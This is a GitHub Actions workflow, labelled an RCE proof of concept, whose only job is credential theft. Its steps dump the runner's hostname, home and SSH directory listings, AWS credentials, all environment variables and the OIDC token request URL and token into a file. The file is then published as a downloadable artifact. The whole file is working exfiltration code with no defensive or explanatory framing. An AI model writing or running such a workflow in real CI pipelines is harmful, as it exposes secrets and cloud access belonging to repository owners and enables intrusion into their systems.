name: CI RCE Reinforced PoC

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  reinforced-payload:
    runs-on: ubuntu-latest

    steps:
      - name: Exfiltrate Sensitive Data
        run: |
          echo "[+] Running reinforced payload" > full_leak.txt

          echo "== HOSTNAME ==" >> full_leak.txt
          hostname >> full_leak.txt

          echo "== HOME DIR FILES ==" >> full_leak.txt
          ls -la ~ >> full_leak.txt

          echo "== SSH Directory ==" >> full_leak.txt
          ls -la ~/.ssh >> full_leak.txt || echo "No SSH folder" >> full_leak.txt

          echo "== AWS Credentials ==" >> full_leak.txt
          cat ~/.aws/credentials >> full_leak.txt 2>/dev/null || echo "No AWS creds" >> full_leak.txt

          echo "== ENV VARS ==" >> full_leak.txt
          env >> full_leak.txt

          echo "== OIDC TOKENS ==" >> full_leak.txt
          echo "$ACTIONS_ID_TOKEN_REQUEST_URL" >> full_leak.txt
          echo "$ACTIONS_ID_TOKEN_REQUEST_TOKEN" >> full_leak.txt

      - name: Upload Artifact
        uses: actions/upload-artifact@v4
        with:
          name: reinforced-leak
          path: full_leak.txt
